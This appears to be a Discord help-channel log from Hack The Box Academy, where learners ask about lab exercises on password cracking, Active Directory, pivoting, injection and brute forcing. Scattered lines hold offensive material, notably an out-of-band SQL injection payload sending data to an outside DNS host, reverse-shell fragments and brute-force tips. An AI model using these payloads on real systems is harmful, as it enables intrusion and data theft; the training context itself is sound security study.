they are like the guided mode

oh ya i know but its a ctf

wouldn't have more sense ask in the thm server?

Regardless, tryhackme has a discord for questions.

i got muted

i know

why

make sense

I had u blocked for any reason

was it for asking in locations you werent supposed to be asking in? like asking thm questions in htb module chat?

xd no idea

"no idea"

doubt

A mod probably told him why or he just simply didn't read rules

¯_(ツ)_/¯

considering the quality of his messages i presume he might genuinely not know

what about you are talking

I had him blocked and I don't remember why lol

because you dont like me

I think he was the only person I have blocked

this is still offtopic and you havnt gotten the hint yet @rustic sage

verify your account with #welcome and access the rest of the discord

i got it by An00bRektn

then maybe someone will help in a more relevant channel

give me a example

oh my god

theres no example to give, these are instructions

yea now I understand why

cause right now youre just spamming this channel

Read #welcome

you need to verify your hackthebox account so that you can get access to the rest of the discord's channels & ask your question in a more suitable channel

#welcome contains the information we are trying to give you

It helps to understand a server if you read its #welcome channel

he joined the server 3 months ago

ill later im busy all day

i did already ????

not busy to talk shits

https://tenor.com/bz72N.gif

No you didn't, otherwise you would know what we're talking about on how to verify

At least ask in #1024429874246590575 as that's the only other channel you'll have access to until you verify, following the instructions in #welcome

i know how to verify but i didint verify it and i have readed

i know

If you know then do it

not rn im busy

ahaha

Then go do what you're busy with and stop chatting here

now I know why I had him blocked

time to block him again

i do already

If you do already then do what you didnt do so you don't have to do it already

hm

U get my drift?

who knows

life is hard

again youre offtopic

this isnt a chatting channel

because im always high

<@&861185840277487616>

i didint broke the rules

that's such a lie for me

spamming, and posting intoxicated

read thru his history, bro is either genuinely having trouble with english and google translating everything or high on weed

Can we please keep this channel on topic

hello guys any help would be appreciate it, I ran this command, sudo john-the-ripper.keepass2john L||xxxxx.xxxx|| > logins.hash and when run this other John command john --wordlist=~/Documents/HTB/Academy/PasswordAttack/mut_password.list logins.hash always receive this error message No password hashes loaded (see FAQ)

wth

I mean where is the kdbx file xd

u just have to run keepass2john file.kdbx > file.hash

john file.hash --wordlist=/path/to/wordlist

hm let me try it

is locally in my pc

need sanity check for last question on Active Directory - DCSync

Just finished https://academy.hackthebox.com/module/158/section/1441

That said, during the module I was having issues finding the other hosts as I moved through things. The previous modules suggest using a one-liner for powershell (posted below) to enumerate - but it was giving me false negatives. Was hoping someone might be able to point me in the right direction for what I should have been doing there:

1..254 | % {"172.16.6.$($_): $(Test-Connection -count 1 -comp 172.15..$($_) -quiet)"}

I would imagine you fail a sanity test if your that far along 🙂 but... do you have a question on it?

I think I retrieved the hash for the last question but HTB doesn't seem to accept it

what section is it in which module?

Active Directory Enumeration & Attacks - DCSync

ok, I got you I think. submit the last part after : not the whole hash

you saved my day

I have been there... glad to help.

I have also gotten false negatives with this in the past, I don’t really have any other suggestions other than trying more than one tool/one-liner

Check the arp table, write your own portscanner to run from Windows, etc.

Yeah, that's what I ended up doing. I was just curious if it's known to be inconsistent, and if there's a reason why (timeouts or something) that I'm not aware of. Thanks for the advice though @trail leaf - always appreciated 🙏

If you think through the parts of the one liner, you’re basically sending a single ping packet to each target and checking if you get a response back

Sometimes hosts are configured to not respond to ping, other times the connection is just unstable

@zinc marsh can I DM?

cuz your suggestion gave me the same results

send the command

I'm being not able to crack the file password with john or hashcat even

well with keepass2john file.kdbx > file.hash I'm extracting the Hash but, when try to crack it is the issue

hashcat -m 13400 -a 0 logins.hash ~/Documents/HTB/Academy/PasswordAttack/mut_password.list

I got [s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit => q & if I choose [c] | [f] or [q] the password shown is not working

let me replicate the issue with john

not sure if u kidding me

no man, I'm not kidding you, why I'd kidding you?

what section are you working on?/Module?

Lab Hard | Password Attacks

john file.hash --wordlist=/path/to/wordlist

.

and u don't need to touch anything in hashcat

$ keepass2john Logins.kdbx > logins.hash
$ cat logins.hash
Logins:$keepass$2600000048f742ba4e....SNIP....d9a764d7b5d4e3610e1a021be2f2f1018523c065
$ /usr/sbin/john logins.hash --wordlist=~/Documents/HTB/Academy/PasswordAttack/mut_password.list
No password hashes loaded (see FAQ)

that are the options of the menu while cracking

did you try john --wordlist=~/Documents/HTB/Academy/PasswordAttack/mut_password.list logins.hash

yup

same result

how did you create the hash file? that command should work fine

keepass2john Logins.kdbx > logins.hash

Can you show the response when you didn't type anything?

I mean not "q" or "f" etc

ok.

give me couple of sec I'm trying to replicate eveything from a Kali VM that I have

well if I use ubuntu I get the same error, but in Kali it works fine

is not going anywhere

It didn't complete

that's what I today tought

Just wait

Did you try to do it in pwnbox?

Also -S isn't needed

in a couple of minutes my computer will be landing off..... LoL

You have to wait

not yet, I will trying

Have you tried also using john

yup

Keepass2john. Then John hash --wordlist

¯_(ツ)_/¯

I had no issues with it tbh

Following that line *

I will be start with a clean slate

Mb you didn't download that .kdbx file correctly

It also may be the reason, idk

hmm could be

Password Attacks
Credential Hunting in Linux
Examine the target and find out the password of the user Will. Then, submit the password as the answer.

1. I gained initial access via SSH using Kira's account after altering the password as indicated in the hint.
2. I located a directory containing the files passwd.bak and shadow.bak.
3. I successfully transferred one of the files to my attack host using the command cat passwd.bak | base64 -w 0; echo and subsequently decoded its contents.
4. However, I encountered difficulties while attempting to transfer shadow.bak. Is it essential to have this file to proceed with cracking the hash?

I would greatly appreciate a hint. Thank you.

shadow is the important one, passwd is if you want to be extra and have a nice unshadowed file

^

Yeah thanks, was just having issues trying to transfer it, any ideas?

is it normal for me to only be able to post in the HTB: Academy section?

ok., was downloaded correctly and just waiting hashcat cracked the password, I'm a fuxxing desperate, ty y'all

try literally any other method if base64 is being troublesome for you

HTTP, SMB, FTP, SCP, etc.

DNS why not

glad you got iot! I could never get hashcat to work with it, kept getting salt errors

well hashcat works in my pc unfortunately john doesn't

Damn that's rough

where can we discuss about the boxes?

Newly released boxes have their own channel. For older ones, #boxes.

you'll have to verify first though, instructions in #welcome

okay thanks!

Has anyone done the Web Attacks assessment and available for a DM? I've made it into the admin account and know the vector to the flag, but no matter my payload, the server just hangs.

if you are still having issues with john/hashcat, feel free to ping me

though in your screenshot, hashcat appears to be working fine

the issue with* john could just be a format detection issue

If they used keepass2john , the generated hash should work

yeah, it looks like it was just unhappy loading it automatically

specifying the format would probably pick it up or at least expose any underlying issues

like an outdated version would just give "invalid format" or similar

It just looks like their command was off

so then we'd know its an issue with john vs with the hash

yeah, could be that too

Try it without the XML declaration (version, encoding, etc.)

Yeah, i've managed to try that one. I can declare just a string entity and reference it in the payload and get an output. But as soon as I add SYSTEM and try to read a file, the request just times out

DM is probably better. Feel free.

Can anyone who has done the attacking common services module (DNS) DM me? I am desperate

Are you specifying the ip.

hello bro can you help me more about passphrase or password for bitlocker?

bitlocker2john iirc

so the command will be
bitlocker2john Backup.vhd > hash do i understand correct?

Something like that yeah

I know its beena bit, do you need help still?

I recommend naming your hashes when you do that kinda thing

thank you very much bro

Hey i'm doing the module "Windows Priv Escalation" and i'm on the page "DnsAdmins", i've completed the steps to add myself to the domain admin group, and have logged in and logged out, and run gpupdate /force. I'm still unable to get into the Admin folder for the flag, or run any of the RegEdit commands to clean up. Any help here would be much appreciated.

you can DM me.

Thanks i'll DM you

Hi there, anyone can help with Introduction to NoSQL Injection , skill assessment 2, I just found a username but no idea which endpoint , /reset, /forgot or /login its vulnerable
I though its login because its the only one that where i can generate 500 errors using NoSQLi payloads.
thanks an advance

Look closely at the answer. Pay attention to the dot

has there been any news about the completion of the SOC analyst path?

i know a new box was added yesterday, just curious to see if there are any updates

Someone has done intranet database penetration, I can't solve it, please advise

Hi i identify that can inyect some Time-base payload and efectily cause a delay on the application but what structure of the query should i use to make boolean questions

I need it too, can I message you privately?

Think about what data you want to have. You have found the vulnerable field

can i dm you?

I dont have notes on that section, yet... so it would better to just ask you question here in case someone can help as well.

sure

thanks i will try hard

Is there one for sql I’m new to htb

there are a lot , from beginners to advanced

Okay

Hi there, anyone can help with Introduction to NoSQL Injection , skill assessment 2, I just found a username but no idea which endpoint , /reset, /forgot or /login its vulnerable
I though its login because its the only one that where i can generate 500 errors using NoSQLi payloads.
thanks an advance

Whats betters, starting with Bug Bounty Hunter path or Penetration Tester path?

Look closely at the answer. Pay attention to the dot

#cpts message

hey guys
did some 1 had issues with "ICMP Tunneling with SOCKS" ??

In the server side attacks ssrf section for question "Replicate what you learned in this section to gain code execution on the spawned target, then look for the flag in the root directory and submit the contents as your answer." why can't we just do "curl -i -s http://10.129.212.247/load?q=file:///flag.txt"?

thank U

yo is anybody here like really good at hacking

?

bc i need somebody to take down a roblox game its pretty small

ask roblox discord

hell nah

ill get banned

You'll get banned here.

Bro has free robux link in nio....

Hey guys, i'm following the withebox attack and i"m doing the protoype pollution part , i need to run the web server locally using node index.js but when i try to send request i got not response from the server

what's the output in terminal after running node index.js?

I can't paste it wtf

maybe screenshot?

yeah i can't either

@balmy rivet @dapper flax read #welcome and #rules after that use /verify at #bot-commands to send screenshot here

thx

Hi my name is Oracle
This module is overkill

I cant see my scroll bar
Read a hundred pages so far

I listen on port 1521
And I'm here to have fun

In order for me to see
I need to brute the SID

And you already know that
I will be using ODAT

To upload a shell
Does that ring any bell

WOOOORDD YOOO

https://tenor.com/view/rap-battle-supa-hot-fire-im-not-a-rapper-amazed-wow-gif-16881818

Bro just dropped a rap

did chatgpt write that? 🤣

When something is too boring

U just make a rap about it

Where is the producer tag?

hmm

In the server side attacks ssrf section for question "Replicate what you learned in this section to gain code execution on the spawned target, then look for the flag in the root directory and submit the contents as your answer." why can't we just do "curl -i -s http://10.129.212.247/load?q=file:///flag.txt"?

Hi! I'm having trouble to complete the module Pivoting, Tunneling, and Port Forwarding, section RDP and SOCKS Tunneling with SocksOverRDP

I added the dll and then I'm trying to connect through rdp but I get this message

any help please?

Who can tell me what to do if I cannot access the intranet server during intranet penetration

i know it's stupid i'm a newbie

ask the administrator of the intranet server

Have you turned off the Real Time Protection?

yes

I couldn add the dll file otherwise

EDIT: Nvm got it!

hello i'm new and i learn linux fundamental 1 question uname -a easy 2. pwd easy 3. wtf: What is the path to the htb-student's mail? i don't know comment to this task

Where is the mail kept on a linux system?

@livid pier I don't see it described in the module

https://www.systranbox.com/where-is-mailbox-file-linux/

on youtube guy use cd, cd is next page

cd is a command to change your current directory

can i dm someone for Broken Authentication --> Brute Forcing Cookies

uuu

it is hard xd thanks

you get it?

But yes, this is all hard at first

then after you do it for a while, its still hard

The Footprinting module made my ports notes HUGE

I think its one of the best mods

I use something from it all the time

i know key so answer will be in /usr

htb-student but to get there

Not quite

to get to var you can do

cd /var

ls /var/mail

i find mail

nice, anything in there?

no

but i have to write /var/mail/htb-student

I think today is the day

🎉

I'm finally gonna finish the Footprinting module

They should show examples of each command in use in the tutorial xd

4 next hard question xd

5 and 6 question easy 4 is hard xd

something about shh ?

Which shell is specified for the htb-student user?

dude commend env op

you dont have to put the answers in chat

ok

guys im on module pass attacks section linux pass the ticket

can someone help me understand how chisel and proxy works i dont get it.

also when i set up the whole thing i cant connect from target to my attacks host smb share

Chisel and proxy are tools used for creating network tunnel

ok i got that but it forwards everything that target recieves to me or?

every port is forwarded or ?

Hey i'm trying to do the privesc whitebox prototype pollution module , i'm following everything , used burpsuite to send to payload but its not polluting anything

hey, in the broken authentication module "Brute Forcing usernames" section. how am i supposed to solve the last exercise with automation?

i got the answer but i tried every username by hand since the list wasnt long

just wondering how should i automate this process

i tried hydra but couldn't get it to work

good day friends, i am at Web attacks chaining idor , i am trying to write a script to enumerate all users, but the curl give me rubbished output, how to fix that

I'm trying to establish a reverse shell from a Windows machine (target) back to my Pwnbox. I RDPed into the target and launched PowerShell. Back on the Pwnbox, I started a netcat listener on port 443. Then I looked at the "Reverse Shell Cheat Sheet" and saw three payloads I can put into PowerShell to get a reverse shell (the second of those three is recommended in the module section on reverse shells). When I execute the first payload, PowerShell just closes and I don't see any activity back on the PwnBox. The second payload gives me some parse errors (error messages mention expected and unexpected closing brackets/parentheses), and the third payload doesn't work either. I copied and pasted each payload directly into PowerShell and then modified the listening IP address and port number to match my netcat listener on PwnBox. What should I try next?

I am not sure what your dealing with, but https://www.revshells.com/ has some great shells to try. I have good luck using the PowerShell #3 (base64) on windows boxes.

Anyone finish dececting windows attacks with splunk, detecting golden tickets section?

Epic! That worked perfectly. Popped the shell. That's a great resource. I really appreciate it.

Great! Glad it helped. Yeah bookmark that page, it is a great resource for sure.

That does not ring a bell, which module is it on?

ohhh, I have not done that one yet. Good luck!

@vital adder I found it when you emojied

yea congratz on competing the new module and best of luck on your SOC Analyst path

I'm really excited to see what other modules are released in this SOC path.

Do other hands on blue team certs exist? What does an exam on such a cert look like? Are you getting locked up for 7 days in a network and have to stop CPTS exam takers from finishing their exam and whoever finishes their goal gets the cert and the other one doesn’t?

Pretty sure no certs exist that are PvP yet.

I’d be funny, but extremely unfair and not at all comparable between attempts

https://www.securityblue.team/why-btl1

https://www.offsec.com/courses/soc-200/

https://www.eccouncil.org/train-certify/certified-soc-analyst-csa/

24h realistic incident response exam lab sounds interesting... so many fun sounding things in this security field. Does HTB have boxes like that beyond the forensic challenge ones?

Yes, but unfortunately only for business accounts
https://www.hackthebox.com/blog/htb-sherlocks-dedicated-labs

I really hope that these labs will be made available to the community as well.

meh, oh well, I hope it opens up with the new cert to offer more training ground

Yes, I desperately need some experience before I jump into this exam

** Footprinting Lab - Easy**
Question:
Enumerate the server carefully and find the flag.txt file. Submit the contents of this file as the answer.

1. Performed Nmap and found following services:

22 OpenSSH 8.2p1 Ubuntu
53 domain
2121 ProFTPD Server```
2. Connected to FTP server using provided creds
upon any command other than pwd, I get this response:
```229 Entering Extended Passive Mode (|||11591|)
150 Opening ASCII mode data connection for file list
226 Transfer complete```
So I cannot traverse or retrieve data from the ftp server...
3. Tried to connect to SSH service but I this error:
```Permission denied (publickey)```
I know that I must use either the FTP or DNS servers to retrieve the private SSH key to connect to SSH and retrieve the flag. However, I need some help regarding my errors or how I can enumerate the FTP or DNS services better.

Thank you in advance for any help.

Read the sections in the module again. There you will learn everything you need to enumerate DNS or FTP.

I enumerated according to the sections but I found nothing. Here is the command and output for DNS enumeration which I left out by mistake:
dnsenum --dnsserver $IP --enum -p 0 -s 0 -o found_subdomains.txt -f /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt dev.inlanefreight.htb

ns.inlanefreight.htb.                    604800   IN    A        10.129.34.136

Is there a specific thing I'm missing?

Any one able to give me a hint for:
AD Enumeration & Attacks - Skills Assessment Part I
Q5, trying to get the clear text creds, cant seem to find them

What exactly is DNS for?

I'm working on "Automating Shells and Payloads with Metasploit" in the Shells and Payloads module. I use the same metasploit module mentioned in the HTB module and use the credentials provided by the question. I get a meterpreter session and then type "shell" as recommended in the module to get a session with more features. I'm supposed to find a Documents folder, but I can't find one. I also assumed that Metasploit would log me in as the user whose credentials I provided, but it didn't. I can't figure out how to get a session as that particular user. Any tips?

||CME|| is your friend 😉

have tried using it, but will give it another go

anyone on "Windows Priv Esc ->Attacking the OS-> UAC"? I'm not getting any connection back when running SystemPropertiesAdvanced.exe when the right ".dll" is placed in the PATH where my user has write privileges. Did anyone experienced the same behaviours?

Anyone know how to fix mimikatz module not found when trying to run through CME?

Mimikatz works as far as I know only with this version
mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
newer versions do not work.

||CME or lazagne should work||

The second one was not working so attempted to move to the first and getting the error.

If the dll is in the right place and named correctly, then it should work.

Send me the command per DM you used.

Gotta head out now. So will give another go when I get a chance else will do 👍

Anyone who has finished the Pivoting, Tunneling and Port forwarding module can help please? I'm stuck

I following the steps as said in the section but it fails when trying to connect from windows to rdp

Is the target not reachable or are the creds wrong?
I remember that I had to use the US VPN servers so that the creds were accepted.

it is in the right place and copy and paste for the name. I'm wondering if the firewall is in between since connection on port 443 doesn't work but checking the rules in outbound is all open. I'll reset the machine just in case

The target is not reachable

I have tried from my kali machine and nothing

Then your tunnel is not built properly.

And now I am trying from the pwnbox and it doesn't work either

Try port 53
This port is in most cases open to the outside 😉

DNS servers are like bookshelves of phone books with names and IPs

Would really appreciate some help sir

and why exactly are you looking for files in it?

But these other ports....
These are FILE transfer protocols.

Im just trying to enumerate everything that is available to me

😉

But as you can see when i try to access the file transfer protocols i get the errors shown above

😉

Hello Guys, i'm struggling with Password Attack Hard lab. After succesfully mounting the .vhd file, what should I do next? i''m so stuck!!

I do not see any error messages

150 Opening ASCII mode data connection for file list
226 Transfer complete```
This

Take a look at the contents of this backup.
Backups usually contain exciting files.
Files that are locked during operation can be accessed this way.

Why is this an error message?
I don't see what exactly you did, nor do I see what the output is.
Send me a printscreen via dm

Thank u I will send u it soon

I found a SAM and SYSTEM file but dunno what to do next.. It is encrypted also?

"Attacking ColdFusion" Does this have some connection issues? Even with timeout with 520seconds I still cant load the page or execute script

Anything in the skills assessment was likely covered in the module, go back and look through it

On the Foothold PC
What does this command show you?

C:\Users\b-student\Desktop\SocksOverRDP-x64>netstat -antb | findstr 1080

They ported the retired box Arctic to Academy for that one, and it’s extremely slow

can someone help me with the password attacks module hard lab? i am trying to brute force the services avaible and according to the forum i am on the right path but after 2 hours i still have nothing

Maybe a wrong list?

i am using the list created in the first steps of the module

That should be correct.

the one with all the mutated passwords

I'm always on the point to test the connection with the srrstr.dll and the test connection works. Then I have to exit from rev shell received since I have to run the SystemPropertiesAdvanced.exe which in turns will search for the paths where the malicious dll is stored. Tried to use other binaries that may do the same like SystemPropertiesProtection.exe but nothing...

Oh wow, got the hashes, thanks @trail leaf and @acoustic owl

If your test connection works, it should also work with the malicious dll.

well it doesn't 😂

Send me a DM how you created the dll and the rest of the commands

I’m not there yet so it wont be correct

Can dm you?

sure

hey, in the broken authentication room, "brute forcing passwords" https://academy.hackthebox.com/module/80/section/777. in the exercise there seems to be a rate limit which i cant seem to figure out work around it

i try hydra but its giving me false positives

would appreciate some help

-38 seconds?

i havit to it need to be a bug

reatart the maschine

can you help me with this

i cant solve it

dm?

test with burp a lot of diferett passwords to find out the rules

like:

qwerty

i think i found the rule already

Quwerty

i just cant get past the rate limit

min max lang and more test more

2. use grep to filter the rockyou.txt (100%)

i already did this

how do i brute force with this stupid rate limit that is my question?

when you not know how grep work google or chatgbt for this he is your frand

in burp you can set a timing

wait a take a screan shot

j

reastart the module

i did

It just doesnt work at all.

when you use burp

you can use in the includer a request pool

set the time on that what the side says

youst do a few wrong logins not how manny needet and how long the wait time is

@verbal kraken

i dont understand

i found it

but i wrote each password by hand

how shouldve i done it?

this room is frustrating

all of its exercises are frustrating

i need some help please

Find out how many login attempts are allowed and then how long you have to wait.
Then use Burp or write a Python script which executes the bruteforce attack

how would i be using burp?

i figured both those things out

#modules message

this would be sending a request every 5 seconds for example?

how do i set this up?

You can use any tool that lets you insert a time delay between tries. I did that one with wfuzz because you can give wfuzz the param -s 10 to delay 10 seconds between each try.

is there a way i can send for example 5 requests then wait 30 seconds then send them again?

im sorry if im being annoying

yes, with python

Yes. In Burp its super easy. You Just need to do some research: https://gprivate.com/66a0r

You want Resource Pools under Intruder

can someone dm me to give me a hint for the password for J?

J what?

hint: try harder

well i cant make cme run faster so i cant try harder

well I cannot guess what module are u on

oh sorry forgot to mention i was talking here earlier, im on the hard lab for password attacks

hydra

mutated

well u can use cme but is slower

i have tried hydra and cme for the past 3 hours and still nothing

what port

winrm for cme and rdp for hydra

Try smarter! Try harder! 🎵 Harder, better, faster, smarter! 🎵

u doing something wrong

and u will need a windows vm as well for this lab

I don't think you need a VM for it

But you need to make sure you're using a mutated password list using the provided custom rule

I bruteforced it with cme using smb

I couldn't mount the kdbx in kali

I think payloadbunny was able

Worked fine in pwnbox

ah well I don't use pwnbox

i am using the right wordlist but after going through all the 55 thousand words it still did not find the right pasword

no you dont

Ive not used a windows VM in the entirety of CPTS

Did you do the thing were you cut the first odd amount of lines to make one of the earlier sections go by faster 🙂

I couldnt remember if that was for that one

Its for like all of them tbh

It isnt, but people will use the same list and then wonder why they cant get the answer 😉

Hrm

But yeah

The right mutated password list anyway is like 96k lines

its definitely smaller 😄

but still massive

So even taking out 17k is in the 70k range

So 55k just seems like used the wrong lists

Point is, use the fresh full mut list for the lab

^

🎵 Harder, better, faster, smarter! 🎵

Ive seen that mistake like 5 times here

heh, if you search for 17000 its mentioned 65 times

nope i figured it out. i appears that i only had half of the passwords i should have after creating the mutated list, after recreating it it worked

😉

that mistake wasted 3 hours of my time

Like I said, pretty common mistake

anyways thanks for the help

Hi All,
I got a problem with Splunk - Discovery & Enumeration
It's not working on port 8000 and 8089
Idk how to run this to check the version
Am I doing something wrong or maybe machine need more time?

How long did you wait? It can def take a bit of time for it to load up and the port to be opened...

3 min?
main website is working but on those ports "The connection was reset"

nmap also show me those ports

but don't know why it's not working

I'd try restarting the lab then... I've def had cases where things just didn't work, but if you've already done that (esp if multiple times)... then sorry, out of ideas

https://academy.hackthebox.com/achievement/684384/147
finaly

thanks for help mate

for Windows Privilege Escalation Skill Assesment 1, I'm having trouble getting a reverse shell on the web app. I've|| set up netcat on my kali and I've tried various commands on the webapp line to connect back to the NC (wget, curl) (commands ive used for example: 127.0.0.1 && powershell -c 'curl http://<my tun0>:1234/' I also tried to transfer Invoke-PowershellTCP onto the target but || none seem to work

There are a lot of ways to get a shell but easy on would be trying ||iex|| and ||wget||

can i dm you?

Sure

So I am struggling on this module: https://academy.hackthebox.com/course/preview/windows-event-logs--finding-evil

Is there anything else I can look at for help? I can't even get past the 1st set of questions. Maybe I am not underatanding something. Thank you.

i usually go with uploading nc.exe via certutil and avoid using powershell imo.

hello 1 qq, under Password Attack module | Lab Hard skill assessment, anyone know why the xfreerdp or Remmina not works with the credentials found in the keepass but, does work with smbclient ..!!!

Try to see what is in smb.

I found the smb content but, I was wondering why the creds not works with xfreerdp or Remmina

Because maybe they are not designed to work with that

Not all users that have access to SMB are guaranteed access to RDP and vice versa

hmm ok., understood, ty y'all

someone who rocks with Linux..?, to DM

What do you mean. ?

I'm having this issue with Linux, I made every suggestion found on the web with no success....

Send me a dm with issue and little details

python2.7 : Depends: python2.7-minimal (= 2.7.18-13ubuntu1.1) but it is not going to be installed E: Unmet dependencies. Try 'apt --fix-broken install' with no packages (or specify a solution).

Did you try running
sudo apt --fix-broken install, and if so, what was the result?

Is it that you can't get your web shell, or you can't get anything onto the box? What shows up on your web log? Does your victim hit your machine?

this is the result:
dpkg: error processing archive /var/cache/apt/archives/python2.7-minimal_2.7.18-13ubuntu1.1_amd64.deb (--unpack):
new python2.7-minimal package pre-installation script subprocess returned error exit status 1
Errors were encountered while processing:
/var/cache/apt/archives/python2.7-minimal_2.7.18-13ubuntu1.1_amd64.deb
E: Sub-process /usr/bin/dpkg returned an error code (1)

Based on that, beyond my level of knowledge... I will say that Python2 is highly deprecated... if I were in your shoes, I might look to try and get the script to work in Python3, look for something else, or install an OLD VM that had Python2 support on it... I'd also look into trying to setup a Python virtual environment... Note: I'm sure there's a better/easier/faster way, but those are all literally things I've done because of Python2 being deprecated

@fossil crescent I know Python2 is deprecated but the .py john's scripts unfortunately run in python2.7

You could also try removing (sudo apt-get remove python2.7 [or something along those lines -- can't remember the exact syntax]) and then try reinstalling

that's exactly what I'm trying

In the Getting Started module - Nibbles Privilege Escalation section, I have gotten all the way to where I am trying to run ||monitor.sh|| with the modified code. Every time I try this (after the chmod command listed), it just spits out an error saying:
||ome/nibbler/personal/stuff/monitor.sh: 26: /home/nibbler/personal/stuff/monitor.sh: [[: not found||
||/home/nibbler/personal/stuff/monitor.sh: 36: /home/nibbler/personal/stuff/monitor.sh: [[: not found||
||/home/nibbler/personal/stuff/monitor.sh: 43: /home/nibbler/personal/stuff/monitor.sh: [[: not found||
||/home/nibbler/personal/stuff/monitor.sh: 118: /home/nibbler/personal/stuff/monitor.sh: mkfifo/tmp/f: not found||
Any way around this? I've tried resetting the box and it still happens (working in Kali because couldn't get the pwnbox to work on the reverse shell)

Also, my nc terminal windows says listening on [any] 8443 ...
10.129.148.70: inverse host lookup failed: Unknown host
connect to [10.10.16.3] from (UNKNOWN) [10.129.148.70] 40588

Hey, so I was doing the Web Attacks assessment and with the ||XXE Injection|| part, the request would always just hang once I added the ||SYSTEM|| command into the ||entity||. After pulling hair, I tried it on a different different computer/network and it went through and I got the response. After more troubleshooting to figure out what was blocking the request, I found that connecting to a VPN (ExpressVPN) allowed the request to go through from my home network.

Could this be my ISP inspecting and dropping the packets with malicious code? I assume since the website is in the clear, they could easily see the request going through.

If you have this output it should mean it succeeded and you got a root shell

Neither of my terminals (one on target machine and one on local vm) allow me to send commands as root after this…is there something else I should be doing?

You got # as the last line of the nc output, right?
You should be able to type commands directly after that

It went to a new line running as my user@kali-$ immediately

Without allowing me to type commands as root#

can you dm me the content of monitor.sh

I got off my computer, I will after school tomorrow. Sorry for the delay :(

no problem, ask again here tomorrow then

Alright. Thanks!

hey guys, I'm stuck in the hard lab from Password attack module, I've already the .vhd file but, I'm not able to mount..!!!

not quite sure if the file is protected and, if it is, not sure how to extract the hash either..!!!

any hint would be good appreciate it

since it's a password attack module, did you crack the password?

no cuz I don't know how to do it....

I review the module but unfortunately I didn't find anything related to vhd files

unless I'm missing something

i would advise reviewing section Protected Archives. May not involve VHD but you can find similar utilities

sweet

old mate john is pretty good with these kinds of things... just have to find a way to give it 2john

Hi,
In Blind SQL Injection->Out-of-Band DNS
I start interactsh-client, it's works well with curl (I receive the requests and subdomains)
In burp I send this request like in the example to test if it's works:
GET GET /api/check-username.php?u=maria'%3bDECLARE+%40T+VARCHAR(1024)%3b+SELECT+%40T%3d(SELECT+1234)%3b+SELECT+*+FROM+fn_trace_gettable('\\'%2b%40T%2b'.blindsqli.academy.htb\x.trc',DEFAULT)%3b--%2b-
I have replace blindsqli.academy.htb by my DNS but it's doesn't work.
Anyone can help me just for the example please

Check the Header

Sorry it's:

GET /api/check-username.php?u=maria'%3bDECLARE+%40T+VARCHAR(1024)%3b+SELECT+%40T%3d(SELECT+1234)%3b+SELECT+*+FROM+fn_trace_gettable('\\'%2b%40T%2b'.blindsqli.academy.htb\x.trc',DEFAULT)%3b--%2b-```

It's a paste error

What exactly do you mean by "i have replace"?
You have to make an entry in the DNS zone on the server.
The module describes how to do it

Can someone give me hint on the answer format of this question? DOCUMENTATION & REPORTING > Types of Reports

I replaced by the dns generated with ./interactsh-client

OR with https://app.interactsh.com/#/ like:

GET /api/check-username.php?u=maria'%3bDECLARE+%40T+VARCHAR(1024)%3b+SELECT+%40T%3d(SELECT+1234)%3b+SELECT+*+FROM+fn_trace_gettable('\\'%2b%40T%2b'.ckjrd6c2vtc0000m2z2ggj3cgucyyyyyb.oast.fun\x.trc',DEFAULT)%3b--%2b-

I assume it is “<something> box”

Does it work for you?

Did you make the entry on the DNS server (port 5380)?

No, but now yes and it works 👍

thx

Look again in the module. Especially the chapter Penetration Testing

I have the same problem, any help ?

Yep damn u replied to my chat that was 11 days ago

Hey!
i'm currently stuck at "Running SQLMap on an HTTP Request" case3. any hints here would be nice

Yes I made a research 🙂

did u figure it out ?

yess im about to complete cpts path 🙂

dm me

have u solve this ?

what's the issue?

Hi everyone!
Currently on Attacking common services - easy section.
Got credentials. Found out where I should upload reverse shell.
But any attempts to create a file causes MariaDB syntax error(" symbol)

Update: nvm guys, found out a way how to solve it

Me ? Hashcat last question skill assesment, already got most used password but can’t cracked

so you got used password? just get the got used hash and crack that

guys when im gonna do python what program should i use?

You can use any text editor for this.

Okay

but i can't
so it just crack as basic crack ?
if yes maybe i got wrong hash

could someone help with "SQLMAP ESSENTIALS" "Running SQLMap on an HTTP RequestRunning". please send me a DM.
would have appreciated it

solved, use wrong hash type

how do I do the first lesson with the target what do I do with the ip and port?

#battlegrounds

Type or copy the ip and port together in mozilla firefox(in VM)

ye it says unable to connect

uhh, can you explain what did you do?

just pasted it into Firefox

in VM?

ye

strange

usually, it congrats you and give you the proof

ye it just says unable to connect

umm, i mean i can tell you the proof

to clear your quiz

I wanna fix it tho so it doesn't cause further problems

should i?

sure

nothing loads on firefox it all says it timed out

should i get a input field @ https://x.x.x.x:xxxxx/case3.php in the "Running SQLMap on an HTTP Request" part of sql essentials module?

Ok so I'm working on the file upload module assessment I've figured out how to extract information but I'm unsure of how to leverage it all can someone please help me

i need help i cant connect to the ip and pord on firefox in the workstation

which module are you working on?

I'm working on the Footprinting Module Labs Can u please help me

introduction to academy

whats up there can you explain your problem?

It's quite long so I'll DM you

Pardon these questions as I’m not certain how to phrase them.

When Academy asks me to install tools from git, I’ve been cloning them into my home directory.

My questions are:
Is this best practice, or would an expert store these tools differently?

When there are updates to the repo, how would I ask my machine to update packages cloned from git?

I'm still fairly new, I've only been studying this for 1.5 years, but before I paid the extra for VIP I had a dedicated directory for HTB on my Kali instance. Idk if it's best practice but I felt it helped keep my things more organized.
It looks like using the 'git pull' command will update packages

morning hackers

i'm doing the attacking the common services module

doing the ftp currently

i'm running the medua command but ftp isn't on the traditional port

Thank you. 🙏🏻

i did -n (port#) at the end of command but its till not working any hints ?

use hydra

ok

that is a short way to bypass the problem cause I haven't use medusa but I'll have a look and see why isn't working

keep me posted please i wanted to use medua

hi, this is suppose to be super easy but I don't get what I am doing wrong:
https://academy.hackthebox.com/module/109/section/1035

I am trying all the formats and URL encoding. I know the answer but why does it keep saying invalid input?

and you know whats crazy, the answer is capitalized for both words, and in the question its not, its ridiculous

question out of curiosity, what do people use for notetaking?

that is, taking notes of academy stuff rather than findings doing a box etc

I use Obsidian, I hear cherrytree is another good one

i use obsidian and cherrytree for commands. i recently messup up my kali machine and lost all my notes

so yea, w.e you put in cherrytree make ure obsidan has a breakup just in case

what is hack the box?

#welcome

hey tryhacks01

I messed up my kali before but I was able to recover my Obsidian notes

or can any body advise me to learn cyber security free? @elfin cedar

youtube

@high reef are you able to get to the login screen?

channels?

nope i meesed up my mount. i was able to get into the grub menu but i never set the password for my root account

ahhhh

thats what made me setup the obsidian sync thing, well at least the google drive way

